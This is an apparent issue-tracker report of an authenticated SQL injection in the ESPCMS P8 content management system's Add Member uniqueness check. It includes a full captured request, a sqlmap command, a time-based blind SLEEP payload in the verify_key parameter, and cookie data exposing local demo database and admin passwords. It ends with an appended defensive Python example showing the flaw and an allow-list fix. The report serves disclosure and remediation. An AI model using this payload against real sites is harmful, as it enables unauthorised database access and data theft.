
轻舞飞沙 / 易思 ESPCMS-P8 Enterprise Website Management System


There is a sql injection vulnerability in ESPCMS P8.21120101

Status: To do
Created on 2022-12-29 16:04

Issue

After logging in to the admin backend, there is a SQL injection vulnerability in the Add Member function.

Steps to reproduce

  1. Log in to the management background
  2. Click Member>Add Member

Problematic packet:

GET /espcms_admin/index.php?act=X9DCVqHOg51sW5WnJNik2%2BEh6%2BhfdozuajbeQYirJJk%3D&verify_value=xxx&verify_key=username&verifyType=0 HTTP/1.1
Host: 127.0.0.1:8010
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8010/espcms_admin/index.php?act=RCJVc7i2vPJsW5WnJNik2yqO9KotWWATQJ%2BJr83OPQ4%3D&par_iframes_name=espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36&iframes_name=espcms_tab_iframe_731749b97e8fc862e9de34d80c1fa7c8&freshid=0.07419096625411115
Cookie: espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_now_page=0; espcms_tab_iframe_5590a90a573784a598205a10098c0b2a_per_page_num=20; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_now_page=1; espcms_tab_iframe_5422a5273a8fd3166593e06f654c7965_per_page_num=20; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_now_page=0; espcms_tab_iframe_fffab004e6898134938e4dfff70a6a36_per_page_num=20; espcms_admin_user_info=vHzemLN06s%2BCBCZmysn5BEspscayx5moFZbFc%2BYiMsiK0A8JxQV1DgryT8ALHbP%2FpWpbeeMDWVhDSQf9nN0bg2oehJsC38ek42J4vhZ%2BEpBhUHpwgyAokKcDe9vfVTK81r9Qa0Zk0J46c5yrfur061b%2B5m%2F63da2Tp1gB7Bzm1wUVS5K648%2B8RXzpevd9RO03oyPJPqCojA0scG7KhdhwuutSQMB1m71Ng4%2BPvDfjsR%2FlRBzorN2mVwfNgUpPvbLOU0HNAi9NgJAwOPqLRQaP6G3EItDbWNtTVcfATuOhD2wspV3ear%2Bx7iP0kfiTurVPrUe%2FJPzcqhl3ubkaeNRuRhCKQsDDu8Iac%2FKrilQamMDIkjdXmZhHNY6an3KLn7247Nlm9K4zgTeEOesUWP2YGKnN0mtOfNbgBQNJRcx5rFfSW0VlP%2BVIzSxwbsqF2HCMSQ44W0oifYTfA69ictDGQ0uLADH%2BpdZ; espcms_admin_user_server_info=N8LTSEOntanP%2Bv9d2FaEWTLHmuuYWpMc8zj6G50bHR%2Fr%2BZotmzdaJM%2F6%2F13YVoRZNBBGeYuLw0rz73sgkXaYDqOpkSEbSBU5; PHPSESSID=nh6n2915gtuedqm93nql1nuv1k; espcms_setup_db=a%3A14%3A%7Bs%3A7%3A%22db_host%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A7%3A%22db_name%22%3Bs%3A15%3A%22espcms_p8_demo1%22%3Bs%3A7%3A%22db_user%22%3Bs%3A4%3A%22root%22%3Bs%3A11%3A%22db_password%22%3Bs%3A4%3A%22root%22%3Bs%3A9%3A%22db_prefix%22%3Bs%3A7%3A%22espcms_%22%3Bs%3A12%3A%22db_setuptype%22%3Bs%3A1%3A%220%22%3Bs%3A11%3A%22db_linktype%22%3Bs%3A1%3A%220%22%3Bs%3A13%3A%22module_dbdemo%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22module_app%22%3Bs%3A1%3A%220%22%3Bs%3A14%3A%22admin_username%22%3Bs%3A5%3A%22admin%22%3Bs%3A11%3A%22admin_email%22%3Bs%3A15%3A%22admin%40admin.com%22%3Bs%3A14%3A%22admin_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A19%3A%22validation_password%22%3Bs%3A8%3A%22admin123%22%3Bs%3A7%3A%22webname%22%3Bs%3A6%3A%22espcms%22%3B%7D; espcms_admin_login_verification_code=93CeyfmSi1jO%2BQUah35IwA%3D%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Use sqlmap: sqlmap.py -r ss.txt -p verify_key --current-db


---
Parameter: verify_key (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: act=or73S4mLbK+u7ZRDsPSnahehmi0uNdR25zCzZisJjaI=&verify_value=xxxx&verify_key=username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)&verifyType=0
---
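The sqlmap result above shows that `verify_key` (the member field being checked for uniqueness) is interpolated into the WHERE clause. As a defender-side illustration added here, not code from the issue or from ESPCMS, the following shows the weak pattern beside its hardened form: allow-list the field name before it reaches the query and bind the value as a parameter. The table, column names and in-memory SQLite database are constructed stand-ins, not the CMS schema.

```python
import sqlite3

# Constructed allow-list of member fields the uniqueness check may query.
# These are stand-in names; the real ESPCMS column list is not on the page.
ALLOWED_VERIFY_KEYS = frozenset({"username", "email", "mobile"})


def build_query_unsafe(verify_key: str, verify_value: str) -> str:
    """The weak pattern the sqlmap finding implies: the field name (and the
    value) are concatenated into SQL, so a verify_key of
    'username AND (SELECT ... SLEEP(5) ...)' becomes part of the statement.
    Returned as a string only; it is never executed here."""
    return f"SELECT COUNT(*) FROM member WHERE {verify_key}='{verify_value}'"


def check_unique(conn: sqlite3.Connection, verify_key: str, verify_value: str) -> bool:
    """Hardened form: reject any field name outside the allow-list, then
    bind the user-supplied value as a parameter. Returns True if no member
    row has that value in that field."""
    if verify_key not in ALLOWED_VERIFY_KEYS:
        raise ValueError(f"rejected verify_key: {verify_key!r}")
    # The identifier is now one of a few known-good literals; quoting it keeps
    # the statement well-formed even if a reserved word were ever allow-listed.
    sql = f'SELECT COUNT(*) FROM member WHERE "{verify_key}" = ?'
    (count,) = conn.execute(sql, (verify_value,)).fetchone()
    return count == 0


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory member table standing in for the CMS database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (username TEXT, email TEXT, mobile TEXT)")
    conn.execute("INSERT INTO member VALUES ('admin', 'admin@example.com', '000')")
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_demo_db()
    print(check_unique(db, "username", "newuser"))  # True: name is free
    print(check_unique(db, "username", "admin"))    # False: already taken
    # A quote-bearing value is just data once it is bound as a parameter.
    print(check_unique(db, "username", "admin' OR '1'='1"))  # True: no such user
    # The field name from the report's payload never reaches the database.
    try:
        check_unique(db, "username AND (SELECT 3018 FROM (SELECT(SLEEP(5)))QCXL)", "xxxx")
    except ValueError as exc:
        print(exc)
```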

Comments (0)

jakets created the task
